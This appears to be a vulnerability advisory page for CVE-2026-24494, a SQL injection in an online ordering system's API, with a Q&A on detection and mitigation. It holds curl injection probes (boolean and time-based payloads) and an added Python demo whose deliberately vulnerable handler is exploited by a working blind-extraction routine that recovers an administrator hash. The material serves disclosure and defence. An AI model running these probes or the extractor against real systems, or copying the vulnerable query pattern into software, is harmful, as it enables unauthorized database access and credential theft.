CVE-2026-24494
SQL Injection in Order Up API Allows Unauthorized Data Access
Publication date: 2026-02-23
Last updated on: 2026-02-23
Assigner: 66fe30d5-b042-4547-a192-c18da4c41a81
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| order_up | online_ordering_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-24494 is a critical SQL Injection vulnerability found in the Order Up Online Ordering System version 1.0. It occurs in the /api/integrations/getintegrations endpoint, where the application improperly handles the user-supplied store_id parameter in a POST request.
Because the system does not perform adequate server-side validation and fails to use parameterized queries, an unauthenticated attacker can inject malicious SQL code directly into backend database queries.
Security testing confirmed the flaw with boolean-based and time-based blind SQL injection, which means an attacker can steer query execution and extract data even though the endpoint returns no SQL error output.
How can this vulnerability impact me?
Exploitation of this vulnerability allows unauthenticated attackers to access and extract highly sensitive backend database information, including administrative account password hashes and critical API keys.
Attackers can enumerate database structures and gain full control over application data and administrative functions, potentially leading to data breaches, unauthorized access, and disruption of services.
Because no authentication is required to exploit this flaw, the risk and impact are very high, making it critical to address immediately.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the /api/integrations/getintegrations endpoint with both boolean-based and time-based blind SQL injection techniques.

Boolean-based tests send crafted POST requests with the store_id parameter set to SQL conditions that evaluate to true or false and compare the responses: a true condition should reproduce the normal response, a false one should change it.

Time-based tests inject SQL that makes the database pause for a fixed interval and measure the response time, which confirms execution of injected code even when no error messages are shown. The delay function is DBMS-specific: WAITFOR DELAY is T-SQL (Microsoft SQL Server); MySQL and MariaDB use SLEEP(5), PostgreSQL pg_sleep(5). The advisory does not name the database engine, so probe with the form that matches the deployment, and prefer an AND-appended condition over a stacked statement (the `;` form), since many drivers reject multiple statements per query.

- Use curl or a similar tool to send POST requests to /api/integrations/getintegrations with crafted store_id values, URL-encoding the payload so spaces and quotes survive the request.
- Boolean-based test (compare the two responses; identical output for the true case and a different or empty result for the false case indicates injection):
  curl --data-urlencode 'store_id=1 AND 1=1' https://target/api/integrations/getintegrations
  curl --data-urlencode 'store_id=1 AND 1=0' https://target/api/integrations/getintegrations
- Time-based test (the original page gives the T-SQL form; `-w` prints the total request time so the delay can be compared against an unmodified request):
  curl --data-urlencode "store_id=1; WAITFOR DELAY '00:00:05'" -w '%{time_total}\n' https://target/api/integrations/getintegrations
- Only run these probes against systems you are authorized to test; a time-based probe at scale is a denial-of-service against the database. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation: contact the vendor for a fixed release and apply it; the advisory lists only version 1.0 as affected and does not name a patched version. Until a fix is available, restrict network access to the endpoint where possible, because the flaw needs no authentication.
Deploying a Web Application Firewall (WAF) can add a layer of protection by filtering requests that carry SQL syntax in store_id, but a WAF is a compensating control, not a fix, and blind payloads are routinely tuned to evade signature rules.
Long-term remediation: use parameterized queries or prepared statements for every database call, reject any store_id that is not a plain integer before it reaches the query, run the application with a least-privilege database account (no access to administrative tables or to the credential store), and suppress verbose SQL error messages so failed probes reveal nothing.
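The following is an added example and not code from the advisory or from the Order Up project. It reconstructs, against an in-memory SQLite database, the CWE-89 pattern the advisory describes (request parameter concatenated into the SQL text) beside the parameterized form recommended above, then runs the boolean-based blind check from the detection answer against both handlers and, where the check succeeds, extracts a constructed administrator hash one character at a time by binary search. The table names, column names, handler signatures, sample rows and hash value are all assumptions; time-based probes are not simulated because SQLite has no sleep function.

```python
import re
import sqlite3

# Constructed sample value; not a real credential and not from the advisory.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def build_db():
    """In-memory schema with constructed data; table/column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE integrations (id INTEGER, store_id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE admins (id INTEGER, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO integrations VALUES (?, ?, ?)",
                     [(1, 1, "stripe"), (2, 2, "paypal"), (3, 1, "twilio")])
    conn.execute("INSERT INTO admins VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.commit()
    return conn


def get_integrations_vulnerable(conn, store_id):
    """CWE-89 pattern: the untrusted parameter becomes part of the SQL text."""
    sql = "SELECT name FROM integrations WHERE store_id = " + store_id
    return [row[0] for row in conn.execute(sql)]


def get_integrations_fixed(conn, store_id):
    """Hardened form: strict allow-list on the input plus a bound parameter."""
    if not re.fullmatch(r"[0-9]+", store_id):
        return []  # a real handler would answer HTTP 400 here
    rows = conn.execute("SELECT name FROM integrations WHERE store_id = ?", (int(store_id),))
    return [row[0] for row in rows]


def is_boolean_injectable(handler, conn):
    """Boolean-based blind check: a true condition must reproduce the baseline
    response and a false condition must change it."""
    baseline = handler(conn, "1")
    if not baseline:
        return False
    return (handler(conn, "1 AND (1=1)") == baseline
            and handler(conn, "1 AND (1=0)") != baseline)


def make_oracle(handler, conn):
    """Turn the endpoint into a yes/no oracle: does the injected condition hold?"""
    baseline = handler(conn, "1")
    return lambda cond: handler(conn, f"1 AND ({cond})") == baseline


def blind_extract_int(oracle, expr, lo, hi):
    """Binary-search an integer-valued SQL expression in [lo, hi] using only
    true/false answers (about log2(hi - lo) requests per value)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract_string(oracle, subquery):
    """Recover a string returned by `subquery`: first its length, then each
    character's code point (printable ASCII range assumed)."""
    length = blind_extract_int(oracle, f"length(({subquery}))", 0, 255)
    return "".join(
        chr(blind_extract_int(oracle, f"unicode(substr(({subquery}), {pos}, 1))", 32, 126))
        for pos in range(1, length + 1)
    )


if __name__ == "__main__":
    target = "SELECT password_hash FROM admins WHERE username='admin'"
    for name, handler in (("vulnerable", get_integrations_vulnerable),
                          ("fixed", get_integrations_fixed)):
        conn = build_db()
        injectable = is_boolean_injectable(handler, conn)
        leaked = blind_extract_string(make_oracle(handler, conn), target) if injectable else ""
        print(f"{name}: injectable={injectable} leaked={leaked!r}")
```

Against the vulnerable handler the oracle answers truthfully and the full 32-character hash comes back in roughly 230 requests; against the fixed handler the allow-list rejects every probe before it reaches SQL, the true and false cases look identical, and the detector reports nothing. The same oracle structure is what sqlmap automates for the real endpoint.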